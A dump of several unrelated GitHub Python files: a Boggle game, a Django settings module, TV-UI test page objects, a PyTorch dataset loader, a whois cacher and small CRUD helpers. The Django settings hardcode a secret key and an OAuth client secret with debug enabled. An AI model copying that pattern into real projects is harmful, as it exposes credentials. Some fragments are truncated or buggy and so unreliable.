20]},\n 'Масса(т)': [4, 9],\n 'Рабочий объем двигателя(л)': [2,12],\n 'Максимальная скорость(км/ч)': [60, 95]}\n\n\npattern_special = {'Количество мест': [],\n 'Габариты': {'Длинa кузова(м)': [], 'Ширина кузова(м)':[],'Расстояние от подвески до земли(см)':[]},\n 'Масса(т)': [],\n 'Рабочий объем двигателя(л)': [],\n 'Максимальная скорость(км/ч)': []}\n","repo_name":"lizsimenia/machine-accounting","sub_path":"functional/pattern_cars.py","file_name":"pattern_cars.py","file_ext":"py","file_size_in_byte":4206,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"5686390128","text":"# -*- coding: utf-8 -*-\nimport sys\nimport json\nimport argparse\n\nimport nicfit\n\nfrom .. import Identity, IdentityChain\nfrom .utils import prompt\nfrom ..common import thumbprint, newJwk, jwkIsPrivate\n\n\n@nicfit.command.register\nclass identity(nicfit.Command):\n HELP = \"Identity and stuffs\"\n\n def _initArgParser(self, parser):\n parser.add_argument(\"-i\", \"--identity\", default=None,\n type=argparse.FileType('r'),\n help=\"File containing an Identity in JSON format.\")\n parser.add_argument(\"-k\", \"--keyfile\", default=None,\n type=argparse.FileType('r'),\n help=\"File containing a private JWK.\")\n parser.add_argument(\"--iss\", default=None,\n help=\"Identity issuer.\")\n\n def _run(self):\n if self.args.identity:\n ident = Identity.fromJson(json.loads(self.args.identity.read()))\n else:\n if self.args.keyfile:\n try:\n jwk = json.loads(self.args.keyfile.read())\n key = newJwk(**jwk)\n if not jwkIsPrivate(key):\n raise ValueError(\n \"Key file does not contain a private key\")\n except Exception as ex:\n print(\"Error loading key: \" + str(ex), file=sys.stderr)\n return 1\n key._params[\"kid\"] = thumbprint(key)\n else:\n key = Identity.generateKey()\n\n iss = self.args.iss or prompt(\"iss? 
\")\n ident = Identity(iss, key)\n\n ident.idchain = IdentityChain.fromIdentity(ident,\n ident.acct).serialize()\n print(json.dumps(ident.toJson(private=True), indent=2, sort_keys=True))\n\n idchain = IdentityChain.deserialize(ident.idchain)\n print(\"\\n## IdentityChain ##:\\n\" + str(idchain))\n","repo_name":"nicfit/Clique","sub_path":"clique/app/identity.py","file_name":"identity.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"5767031042","text":"# Hackaton Challange 2\nfrom random import choice\nimport time\nfilename = \"Dictionary.txt\" #Check that the name is tha same, mine might be different\nfile = open(filename,\"r\")\nraw = file.read()\ndictionaryToCompare={}\nplayer_answers = []\nkeyToAdd = \"\"\npoints = 0\n#load dictionary\nfor k in range(len(raw)):\n\tif raw[k] != raw[2]: #raw[2] is the character that devides my words\n\t\tkeyToAdd += raw[k]\n\telse:\n\t\tdictionaryToCompare[keyToAdd] = 0\n\t\tkeyToAdd = \"\"\n\t\t#print(dictionaryToCompare)\n\n\n#Dices definition\n\ndices = [\n\t\t\t['A','A','E','E','G','N'],\n\t\t\t['E','L','R','T','T','Y'],\n\t\t\t['A','O','O','T','T','W'],\n\t\t\t['A','B','B','J','O','O'],\n\t\t\t['E','H','R','T','V','W'],\n\t\t\t['C','I','M','O','T','U'],\n\t\t\t['D','I','S','T','T','Y'],\n\t\t\t['E','I','O','S','S','T'],\n\t\t\t['D','E','L','R','V','Y'],\n\t\t\t['A','C','H','O','P','S'],\n\t\t\t['H','I','M','N','Q','U'],\n\t\t\t['E','E','I','N','S','U'],\n\t\t\t['E','E','G','H','N','W'],\n\t\t\t['A','F','F','K','P','S'],\n\t\t\t['H','L','N','N','R','Z'],\n\t\t\t['D','E','I','L','R','X']]\n\n# Roll dices\nboard=[\n\t\t[\" \",\" \",\" \",\" \"],\n\t\t[\" \",\" \",\" \",\" \"],\n\t\t[\" \",\" \",\" \",\" \"],\n\t\t[\" \",\" \",\" \",\" \"]\n\t\t]\n\ndef rollDices(board):\n\tchoices_dices=[i for i in range(0,16)] #creates an array of numbers until 15\n\tchoices_face =[j for j in range(0,6)]\n\tfor i in range (0,4):\n\t\tfor j in range(0,4):\n\t\t\tdice_index= choice(choices_dices)\n\t\t\tdice_face = choice(choices_face)\n\t\t\tboard[i][j] = dices[dice_index][dice_face]\n\t\t\tchoices_dices.remove(dice_index) # this dice was already rolled\n\t\t\t\n\ndef print_board(a_board):\n\trow_toprint = \" \"\n\tfor i in range(len(a_board)):\n\t\tfor j in range(len(a_board[1])):\n\t\t\trow_toprint += (a_board[i][j]) + \" \"\n\t\tprint (row_toprint)\n\t\trow_toprint = \" \"\n\n\nrollDices(board)\nprint_board(board)\n\ntime_end = time.time() + (60) #Change the time range\n\n\nwhile time.time() < time_end:\n\tnew_word = input(\"Type a word: \")\n\tplayer_answers.append(new_word)\n\ndef lookForWord(thisWord,this_letter,thisBoard,x,y):\n\t#print(thisBoard)\n\t#print(thisWord,this_letter,x,y)\n\tif (x< len(thisBoard) and y< len(thisBoard)):\n\t\tif(x>= 0 and y >= 0):\n\t\t\tif (thisBoard[x][y] != thisWord[this_letter]):\n\t\t\t\treturn False # no estoy segura de esto\n\t\telse:\n\t\t\treturn False\n\telse:\n\t\treturn False\n\tu = True\n\tif(this_letter= 5):\n\t\t\t\tpoints +=3\n\t\t\t\tprint(player_answers[word] + \" is correct, you get 3 point for this word\")\n\nprint (\"your score is: \" + str(points) + \" points.\")\n\n\n\n\n","repo_name":"maguileracanon/SummerOfCode","sub_path":"Week2/Hackaton.py","file_name":"Hackaton.py","file_ext":"py","file_size_in_byte":4076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"866208898","text":"from pathlib import Path\nimport os\n\n# Build paths inside the project 
like this: BASE_DIR / 'subdir'.\nBASE_DIR = Path(__file__).resolve().parent.parent\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = 'dq_s@_7zbz4k4ws=_(&_asg#*!_gsyrl%(lr!ky8rsh$&1n6ew'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\nALLOWED_HOSTS = ['0.0.0.0', 'localhost', '127.0.0.1']\n\n# Application definition\nDEFAULT_APPS = [\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.sites',\n]\n\nPROJECT_APPS = [\n 'accounts',\n 'blog',\n]\n\nCOMMON_APPS = [\n # allauth\n 'allauth',\n # 'allauth.account',\n 'allauth.socialaccount',\n\n 'sass_processor',\n\n # provider\n 'allauth.socialaccount.providers.kakao',\n]\n\nSASS_PROCESSOR_ENABLED = True\nSASS_PROCESSOR_ROOT = os.path.join(BASE_DIR, 'static')\nSASS_PRECISION = 8\n\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n 'sass_processor.finders.CssFinder',\n)\n\nINSTALLED_APPS = DEFAULT_APPS + PROJECT_APPS + COMMON_APPS\n\nMIDDLEWARE = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\nROOT_URLCONF = 'sns.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [os.path.join(BASE_DIR, 'sns/templates')],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'sns.wsgi.application'\n\n# Database\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': BASE_DIR / 'db.sqlite3',\n }\n}\n\n# Password validation\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\n# Internationalization\nLANGUAGE_CODE = 'en-us'\nTIME_ZONE = 'Asia/Seoul'\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\n\n# Static files (CSS, JavaScript, Images)\nSTATIC_URL = '/static/'\n\nSITE_ID = 1\n\nAUTH_USER_MODEL = 'accounts.User'\n\nAUTHENTICATION_BACKENDS = [\n # Needed to login by username in Django admin, regardless of `allauth`\n 'django.contrib.auth.backends.ModelBackend',\n\n # `allauth` specific authentication methods, such as login by e-mail\n 'allauth.account.auth_backends.AuthenticationBackend',\n]\n\n# static\nSTATIC_URL = '/static/'\nSTATIC_ROOT = os.path.join(BASE_DIR, 'static')\n\n# media\n# MEDIA_ROOT = os.path.join(Path(__file__).resolve().parent.parent, \"uploads\")\nMEDIA_ROOT = os.path.join(BASE_DIR, 'media')\nMEDIA_URL = '/media/'\n\n\nSOCIALACCOUNT_PROVIDERS = {\n 'kakao': {\n 'APP': {\n 'client_id': 'd01f306c90eda69601dda10cdf62631e',\n 'secret': '492230',\n 'key': '',\n }\n 
}\n}\n","repo_name":"oereo/SNS-project","sub_path":"sns/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35041305644","text":"# -*- coding: utf-8 -*-\nimport re\nimport time\n\nimport stbt\n\nfrom common.exceptions import NotInScreen\nfrom common.pages.guia import page_guia\nfrom common.pages.home import page_home\nfrom common.pages.pin import page_pin\nfrom common.utils.rcu import RCU\nfrom common.utils.navigation_utils import send_num_rcu_keys\n\n\nclass Img:\n \"\"\"List of reference images locators\"\"\"\n\n MINIGUIDE = \"./images/en_vivo_mini_guide.png\"\n PROGRESS_BAR = \"./images/en_vivo_progress_bar.png\"\n CHANNEL_FOCUS = \"./images/en_vivo_channel_focus.png\"\n ENVENTANAR_FOCUS = \"./images/en_vivo_enventanar_focus.png\"\n SUGERENCIAS_FOCUS = \"./images/en_vivo_sugerencias_focus.png\"\n MINIGUIDE_FOCUS = \"./images/en_vivo_mini_guide_focus.png\"\n PAUSE_ICON = \"./images/en_vivo_pause.png\"\n SUGERENCIAS_ICON = \"./images/en_vivo_sugerencias_icon.png\"\n ENVENTANAR_ICON = \"./images/en_vivo_enventanar_icon.png\"\n GRABAR_ICON = \"./images/en_vivo_grabar.png\"\n HD_ICON = \"./images/en_vivo_hd.png\"\n INICIAR_ICON = \"./images/en_vivo_iniciar.png\"\n OK_ICON = \"./images/en_vivo_ok.png\"\n PARENTAL_TP = \"./images/en_vivo_parental_TP.png\"\n PARENTAL_07 = \"./images/en_vivo_parental_7.png\"\n PARENTAL_12 = \"./images/en_vivo_parental_12.png\"\n PARENTAL_16 = \"./images/en_vivo_parental_16.png\"\n PARENTAL_18 = \"./images/en_vivo_parental_18.png\"\n MOTION_MASK = \"./images/en_vivo_motion_mask.png\"\n\n\nparental_list = [\n Img.PARENTAL_TP,\n Img.PARENTAL_07,\n Img.PARENTAL_12,\n Img.PARENTAL_16,\n Img.PARENTAL_18,\n]\n\n\nclass EnVivo(stbt.FrameObject):\n \"\"\"Page Object for EnVivo\n\n When instantiated, an image capture is done and\n de property is_visible is set to True if we are\n in EnVivo page.\n \"\"\"\n\n def __bool__(self):\n return self.is_visible\n\n def __repr__(self):\n if self.is_visible:\n return \"EnVivo(is_visible=True)\"\n else:\n return \"EnVivo(is_visible=False)\"\n\n @property\n def is_visible(self):\n \"\"\"Returns True if in EnVivo page\"\"\"\n\n region1 = stbt.Region(300, 525, width=45, height=40)\n\n region2 = stbt.Region(308, 640, width=660, height=75)\n\n bar = stbt.match(Img.ROGRESS_BAR, frame=self._frame, region=region1)\n\n ok = stbt.match(Img.OK_ICON, frame=self._frame, region=region2)\n\n return bar and ok\n\n @property\n def parental(self):\n \"\"\"Returns parental if found\n\n Returns:\n string: parental rate\n \"\"\"\n for parental in parental_list:\n if stbt.match(\n parental,\n frame=self._frame,\n region=stbt.Region(244, 470, width=750, height=70),\n ):\n return re.findall(r\"\\d{1,2}|TP\", parental)[0]\n\n return None\n\n @property\n def channel_number(self):\n \"\"\"Returns channel number if found\n\n Returns:\n int: channel\n \"\"\"\n ch = stbt.ocr(region=stbt.Region(77, 505, width=135, height=55))\n\n try:\n return int(ch)\n except ValueError:\n return None\n\n\ndef is_visible():\n \"\"\"Check if in EnVivo Miniguide\n\n Returns:\n [boolean]: [Returns True if in EnVivo]\n \"\"\"\n en_vivo = EnVivo()\n\n if not en_vivo.is_visible:\n stbt.press(RCU.OK)\n time.sleep(1)\n\n en_vivo = en_vivo.refresh()\n\n return en_vivo.is_visible\n\n\ndef assert_screen():\n \"\"\"Raises Exception if not in EnVivo\n\n Returns:\n [obj]: [Returns instance of page]\n \"\"\"\n if is_visible():\n page = EnVivo()\n return 
page\n    else:\n        raise NotInScreen(__name__)\n\n\ndef parental():\n    \"\"\"Returns the parental rating of the live event.\n    Checks if we are in live (miniguide).\n    If not, tries to open miniguide.\n\n    Gets parental rating from miniguide:\n    - TP\n    - 7\n    - 12\n    - 16\n    - 18\n\n    Returns:\n        string: parental rate\n    \"\"\"\n    screen = assert_screen()\n\n    return screen.parental\n\n\ndef zap_to_ch(ch, unblock=True, pin=None):\n    \"\"\"Zaps to desired channel from live\n\n    Args:\n        ch (int): target channel number\n        unblock (bool, optional): True if willing to try to unblock channel.\n        Defaults to True.\n        pin (list, optional): list of ints with pin (Ex: [1,1,1,1]). Defaults to None.\n\n    Returns:\n        boolean: True if matches desired channel\n    \"\"\"\n\n    digit_list = [int(i) for i in str(ch)]\n\n    assert len(digit_list) <= 3, \"Invalid number of digits. Must be lower than 4 digits\"\n\n    go_to_live()\n\n    assert_screen()\n\n    send_num_rcu_keys(digit_list)\n\n    time.sleep(5)\n\n    _check_live_state(unblock, pin)\n\n    if get_channel_number() == ch:\n        stbt.draw_text(\n            \"SUCCESS: TARGET CH {}, CURRENT CH {}\".format(ch, get_channel_number())\n        )\n        stbt.press_and_wait(\n            RCU.EXIT,\n            region=stbt.Region(310, 645, width=60, height=70),\n            stable_secs=0.5,\n        )\n        return True\n    else:\n        stbt.draw_text(\n            \"FAIL: TARGET CH {}, CURRENT CH {}\".format(ch, get_channel_number())\n        )\n        stbt.press_and_wait(\n            RCU.EXIT,\n            region=stbt.Region(310, 645, width=60, height=70),\n            stable_secs=0.5,\n        )\n        return False\n\n\ndef go_to_live(unblock=True, pin=None):\n    \"\"\"Go to live if accessible from Home Screen\n    Allows unblocking the channel if a PIN screen is detected\n    If unblock=True and pin is None, default pin is inserted\n\n    Args:\n        unblock (bool, optional): True if willing to try to unblock channel.\n        Defaults to True.\n        pin (list, optional): list of ints with pin (Ex: [1,1,1,1]). Defaults to None.\n    \"\"\"\n\n    if page_home.go_to_home():\n        stbt.press_and_wait(\n            RCU.MENU,\n            region=stbt.Region(310, 645, width=60, height=70),\n            stable_secs=0.5,\n        )\n        _check_live_state(unblock, pin)\n\n\ndef get_channel_number():\n    \"\"\"Returns channel number from miniguide if OCR has succeeded\n\n    Returns:\n        int: channel number\n    \"\"\"\n    return page_guia.open_guide_get_channel_number()\n\n\ndef assert_motion():\n    \"\"\"Check if there is motion in screen to confirm live ch is playing\n\n    Returns:\n        MotionResult: contains bool variable \"motion\"\n    \"\"\"\n    return stbt.wait_for_motion(\n        timeout_secs=10,\n        consecutive_frames=None,\n        noise_threshold=None,\n        mask=Img.MOTION_MASK,\n        frames=None,\n    )\n\n\ndef _check_live_state(unblock, pin):\n    \"\"\"Handles if channel is blocked before checking live screen\n\n    Args:\n        unblock (bool): True if we want to unblock channel if it is blocked\n        pin (list): 4-digit int PIN\n\n    Raises:\n        NotInScreen: If not in Live screen\n    \"\"\"\n    try:\n        assert_screen()\n    except NotInScreen:\n        if _is_channel_blocked() and unblock is True:\n            stbt.draw_text(\"Channel is blocked\")\n            if not _unblock_channel(pin):\n                raise NotInScreen(__name__)\n            assert_screen()\n\n        elif _is_channel_blocked() and unblock is False:\n            stbt.draw_text(\"Channel is blocked\")\n            stbt.press_and_wait(RCU.EXIT)\n            assert_screen()\n\n        else:\n            raise NotInScreen(__name__)\n\n\ndef _is_channel_blocked():\n    \"\"\"Check if channel is blocked using Page Pin class\n\n    Returns:\n        True: if blocked. 
False otherwise\n    \"\"\"\n    return True if page_pin.is_visible() else False\n\n\ndef _unblock_channel(pin=None):\n    \"\"\"Access Page Pin to unblock channel\n\n    Args:\n        pin (list, optional): 4-digit int list. Defaults to None.\n\n    Returns:\n        [bool]: True if unblocked, False otherwise\n    \"\"\"\n    page_pin.insert_pin(pin)\n    return not page_pin.is_pin_incorrect()\n","repo_name":"bittersoftware/stb-tester-automation","sub_path":"common/pages/en_vivo/page_en_vivo.py","file_name":"page_en_vivo.py","file_ext":"py","file_size_in_byte":7739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42030982813","text":"import os\n\nimport networkx as nx\n\nhere, _ = os.path.split(__file__)\nhome = os.path.join(here, os.pardir)\nscript_path = os.path.join(home, 'data', 'sql_updates')\n\ndef get_graph():\n    \"\"\"Build a `DiGraph` that captures dependencies between database migration\n    tasks. Each node represents a migration script, and each edge represents\n    a dependency between tasks. 
Tasks can be ordered using topological sort.\n \"\"\"\n graph = nx.DiGraph()\n for path in os.listdir(script_path):\n name, ext = os.path.splitext(path)\n if ext == '.sql':\n graph.add_node(name)\n\n graph.add_edge('candidate_history', 'candidate_detail')\n graph.add_edge('candidate_detail', 'candidate_election')\n\n graph.add_edges_from([\n ('candidate_history', 'candidate_history_latest'),\n ('candidate_election', 'candidate_history_latest')\n ])\n\n graph.add_edge('committee_history', 'committee_detail')\n\n graph.add_edges_from([\n ('candidate_history', 'filings'),\n ('committee_history', 'filings'),\n ])\n\n graph.add_edges_from([\n ('filing_amendments_presidential', 'filings'),\n ('filing_amendments_house_senate', 'filings'),\n ('filing_amendments_pac_party','filings'),\n ('filing_amendments_all', 'filings'),\n ])\n\n graph.add_edges_from([\n ('candidate_history', 'candidate_flags'),\n ('candidate_aggregates', 'candidate_flags'),\n ])\n\n graph.add_edges_from([\n ('filing_amendments_presidential', 'reports_presidential'),\n ('filing_amendments_house_senate', 'reports_house_senate'),\n ('filing_amendments_pac_party', 'reports_pac_party'),\n ('filing_amendments_all', 'reports_presidential'),\n ('filing_amendments_all', 'reports_house_senate'),\n ('filing_amendments_all', 'reports_pac_party'),\n ])\n graph.add_edges_from([\n ('totals_house_senate', 'totals_combined'),\n ('totals_presidential', 'totals_combined'),\n ('totals_pac_party', 'totals_combined'),\n ])\n\n graph.add_edges_from([\n ('committee_detail', 'committee_fulltext'),\n ('totals_combined', 'committee_fulltext'),\n ])\n\n graph.add_edge('committee_detail', 'totals_party')\n graph.add_edge('committee_detail', 'totals_pac')\n\n graph.add_edges_from([\n ('candidate_detail', 'candidate_fulltext'),\n ('totals_combined', 'candidate_fulltext'),\n ])\n\n graph.add_edge('totals_combined', 'sched_a_by_size_merged')\n\n graph.add_edges_from([\n ('totals_house_senate', 'candidate_aggregates'),\n ('totals_presidential', 'candidate_aggregates'),\n ('candidate_election', 'candidate_aggregates'),\n ('cand_cmte_linkage', 'candidate_aggregates'),\n ])\n\n graph.add_edges_from([\n ('committee_detail', 'large_aggregates'),\n ('reports_ie', 'large_aggregates'),\n ('communication_cost', 'large_aggregates'),\n ])\n\n graph.add_edge('committee_history', 'communication_cost')\n graph.add_edge('committee_detail', 'sched_a_by_state_recipient_totals')\n\n return graph\n","repo_name":"ArtyEmsee/openFEC","sub_path":"webservices/flow.py","file_name":"flow.py","file_ext":"py","file_size_in_byte":3065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"31397662985","text":"import os\nimport sys\nimport pickle\nfrom PIL import Image\n\nimport torch\nfrom torch.utils.data import Dataset\nfrom torchvision import transforms\n\nfrom .datasets import register\nimport numpy as np\n\n@register('mini-imagenet')\nclass MiniImageNet(Dataset):\n\n def __init__(self, root_path, split='train', **kwargs):\n self.split_tag = split\n if split not in ['train', 'val', 'test']:\n raise NotImplementedError\n print(\"Okay, \", self.split_tag)\n\n\n data_path = os.getcwd() + \"/materials/mini-imagenet/\" + split\n\n print(\"Data path: \", data_path)\n print(\"Contents: \", os.listdir(data_path))\n data = []\n label = []\n for count, class_id in enumerate(os.listdir(data_path)):\n class_label = count\n class_path = os.path.join(data_path, class_id)\n for class_image in os.listdir(class_path):\n clas_image_path = 
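# --- editor's sketch (not part of the dataset records above/below) ---
# get_graph() above encodes migration dependencies as DiGraph edges, and its
# docstring notes the tasks can be ordered by topological sort. With networkx
# that is a single call; the ordering exists only while the graph is acyclic.
import networkx as nx

g = nx.DiGraph()
g.add_edges_from([("candidate_history", "candidate_detail"),
                  ("candidate_detail", "candidate_election")])
order = list(nx.topological_sort(g))
assert order.index("candidate_history") < order.index("candidate_election")
# --- end of sketch ---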
os.path.join(class_path, class_image)\n class_image_label = class_label\n data.append(clas_image_path)\n label.append(class_image_label)\n print(\"Class: \", class_label, class_id, \" Done\")\n # print(\"Class Image label: \", class_image_content.shape)\n # print(\"class content: \", os.listdir(class_path))\n # sys.exit()\n\n\n\n\n # Need to customize from here\n\n # split_file = 'miniImageNet_category_split_{}.pickle'.format(split_tag)\n # with open(os.path.join(root_path, split_file), 'rb') as f:\n # pack = pickle.load(f, encoding='latin1')\n # data = pack['data']\n # label = pack['labels']\n\n image_size = 80\n\n min_label = min(label)\n label = [x - min_label for x in label]\n\n self.data = data\n self.label = label\n self.n_classes = max(self.label) + 1\n\n norm_params = {'mean': [0.485, 0.456, 0.406],\n 'std': [0.229, 0.224, 0.225]}\n normalize = transforms.Normalize(**norm_params)\n\n self.transform = transforms.Compose([\n transforms.RandomResizedCrop(image_size),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n normalize,\n ])\n #No more need of augment resize\n print(f\"{split} data prep done!\")\n\n def convert_raw(x):\n mean = torch.tensor(norm_params['mean']).view(3, 1, 1).type_as(x)\n std = torch.tensor(norm_params['std']).view(3, 1, 1).type_as(x)\n return x * std + mean\n\n self.convert_raw = convert_raw\n\n def __len__(self):\n return len(self.data)\n\n def get_data(self, i):\n image_path = self.data[i]\n image = np.array(Image.open(image_path))\n return Image.fromarray(image)\n\n def __getitem__(self, i):\n the_data = self.get_data(i)\n # print(\"self.transform(self.data[i]): \", self.transform(the_data).shape)\n return self.transform(the_data), self.label[i]\n\n\nclass MiniImageNet_old_for_reference(Dataset):\n\n def __init__(self, root_path, split='train', **kwargs):\n split_tag = split\n if split == 'train':\n split_tag = 'train_phase_train'\n split_file = 'miniImageNet_category_split_{}.pickle'.format(split_tag)\n with open(os.path.join(root_path, split_file), 'rb') as f:\n pack = pickle.load(f, encoding='latin1')\n data = pack['data']\n label = pack['labels']\n\n image_size = 80\n data = [Image.fromarray(x) for x in data]\n\n min_label = min(label)\n label = [x - min_label for x in label]\n\n self.data = data\n self.label = label\n self.n_classes = max(self.label) + 1\n\n norm_params = {'mean': [0.485, 0.456, 0.406],\n 'std': [0.229, 0.224, 0.225]}\n normalize = transforms.Normalize(**norm_params)\n self.default_transform = transforms.Compose([\n transforms.Resize(image_size),\n transforms.ToTensor(),\n normalize,\n ])\n augment = kwargs.get('augment')\n if augment == 'resize':\n self.transform = transforms.Compose([\n transforms.RandomResizedCrop(image_size),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n normalize,\n ])\n elif augment == 'crop':\n self.transform = transforms.Compose([\n transforms.Resize(image_size),\n transforms.RandomCrop(image_size, padding=8),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n normalize,\n ])\n elif augment is None:\n self.transform = self.default_transform\n\n def convert_raw(x):\n mean = torch.tensor(norm_params['mean']).view(3, 1, 1).type_as(x)\n std = torch.tensor(norm_params['std']).view(3, 1, 1).type_as(x)\n return x * std + mean\n\n self.convert_raw = convert_raw\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, i):\n return self.transform(self.data[i]), 
self.label[i]\n","repo_name":"pandeydeep9/EvidentialResearch2023","sub_path":"FewShotExperiments/datasets/mini_imagenet.py","file_name":"mini_imagenet.py","file_ext":"py","file_size_in_byte":5126,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"23774805641","text":"'''\n    Add Strings\n\nGiven two non-negative integers, num1 and num2 represented as string, return the sum of num1 and num2 as a string.\n\nYou must solve the problem without using any built-in library for handling large integers (such as BigInteger). You must also not convert the inputs to integers directly.\n\n \n\nExample 1:\n\nInput: num1 = \"11\", num2 = \"123\"\nOutput: \"134\"\n\nExample 2:\n\nInput: num1 = \"456\", num2 = \"77\"\nOutput: \"533\"\n\nExample 3:\n\nInput: num1 = \"0\", num2 = \"0\"\nOutput: \"0\"\n\n \n\nConstraints:\n\n    1 <= num1.length, num2.length <= 10^4\n    num1 and num2 consist of only digits.\n    num1 and num2 don't have any leading zeros except for the zero itself.\n\n'''\n\nclass Solution:\n    def addStrings(self, num1: str, num2: str) -> str:\n        c = 0\n        ans = []\n        num1_index = len(num1) - 1\n        num2_index = len(num2) - 1\n        while num1_index >= 0 and num2_index >= 0:\n            s = int(num1[num1_index]) + int(num2[num2_index]) + c\n            c = s//10\n            ans.append(s%10)\n            num1_index -= 1\n            num2_index -= 1\n        if num1_index > num2_index:\n            while num1_index >= 0:\n                s = int(num1[num1_index]) + c\n                c = s//10\n                ans.append(s%10)\n                num1_index -= 1\n        else:\n            while num2_index >= 0:\n                s = int(num2[num2_index]) + c\n                c = s//10\n                ans.append(s%10)\n                num2_index -= 1\n        if c:\n            ans.append(c)\n        return \"\".join(str(val) for val in ans[::-1])\n\nnum1 = \"11\"\nnum2 = \"123\"\n# Output: \"134\"\n\nnum1 = \"456\"\nnum2 = \"77\"\n# Output: \"533\"\n\nnum1 = \"0\"\nnum2 = \"0\"\n# Output: \"0\"\n\nsol = Solution()\nprint(sol.addStrings(num1, num2))\n","repo_name":"jomesh18/Leetcode","sub_path":"Leetcode_challenge/2021/8.August 2021/9.addStrings.py","file_name":"9.addStrings.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9550596831","text":"# http://cryto.net/pythonwhois/usage.html\nfrom datetime import datetime\nfrom pytz import utc\nfrom .models import Domain\nfrom .models import Whois\nfrom django.core import serializers\nfrom pythonwhois import get_whois\nfrom pythonwhois.shared import WhoisException\n\nclass WhoisCachier:\n\n    def update_whois_model(domain_model):\n        try:\n            whois = get_whois(domain_model.domain_name, normalized=True)\n        except Exception as err:\n            print(\"update_whois() failed: {0}\".format(err))\n            return\n        datadict = {}\n        for k,v in whois.items():\n            if not hasattr(Whois, k):\n                continue # skip whois fields not in our model\n            if k == 'id':\n                continue # conflicts with Model field; also is irrelevant data\n            if isinstance(v, list):\n                if len(v) > 1:\n                    datadict[k] = ','.join(v)\n                else:\n                    if isinstance(v[0], datetime):\n                        datadict[k] = v[0].replace(tzinfo=utc)\n                    else:\n                        datadict[k] = v[0]\n            elif isinstance(v, dict):\n                datadict[k] = v\n            else:\n                datadict[k] = v\n        datadict['internal_cache_date'] = datetime.now().replace(tzinfo=utc)\n        whois_record, created = Whois.objects.update_or_create(\n            domain=domain_model,\n            defaults = datadict\n        )\n        domain_model.whois = whois_record\n        
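# --- editor's sketch (not part of the dataset records above/below) ---
# The addStrings record sums digits right to left with a carry. Worked out on
# "456" + "77": 6+7=13 -> write 3, carry 1; 5+7+1=13 -> write 3, carry 1;
# 4+1=5 -> result "533". The same loop can run over both strings at once:
def add_strings(num1, num2):
    i, j, carry, out = len(num1) - 1, len(num2) - 1, 0, []
    while i >= 0 or j >= 0 or carry:
        d1 = int(num1[i]) if i >= 0 else 0
        d2 = int(num2[j]) if j >= 0 else 0
        carry, digit = divmod(d1 + d2 + carry, 10)
        out.append(str(digit))
        i, j = i - 1, j - 1
    return "".join(reversed(out))

assert add_strings("456", "77") == "533"
assert add_strings("0", "0") == "0"
# --- end of sketch ---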
domain_model.save()\n","repo_name":"VEuPathDB/docker-hq","sub_path":"hq/domains/whois.py","file_name":"whois.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1553568455","text":"from models.models import ProblemTypes\n\ndef getAllProblemTypes():\n    try:\n        problem = ProblemTypes.query.all()\n        response = [{'id': i.id, 'description': i.description} for i in problem]\n    except:\n        response = {'message': 'no status exists for any occurrence'}\n    return response\n\ndef getSpecificProblemTypes(id):\n    try:\n        problem = ProblemTypes.query.filter_by(id=id).first()\n        response = {'description': problem.description}\n    except:\n        response = {'message': 'could not find the status'}\n    return response\n\ndef deleteProblemTypes(id):\n    try:\n        problem = ProblemTypes.query.filter_by(id=id).first()\n        problem.delete()\n        response = {'message': 'deleted with success'}\n    except:\n        response = {'message': 'could not find the status'}\n    return response\n\ndef constructProblemTypes(data):\n    try:\n        new_data = ProblemTypes(\n            description = data['description']\n        )\n        new_data.save()\n        response = {'message': 'save with success'}\n    except:\n        response = {'message': 'could not save the status'}\n    return 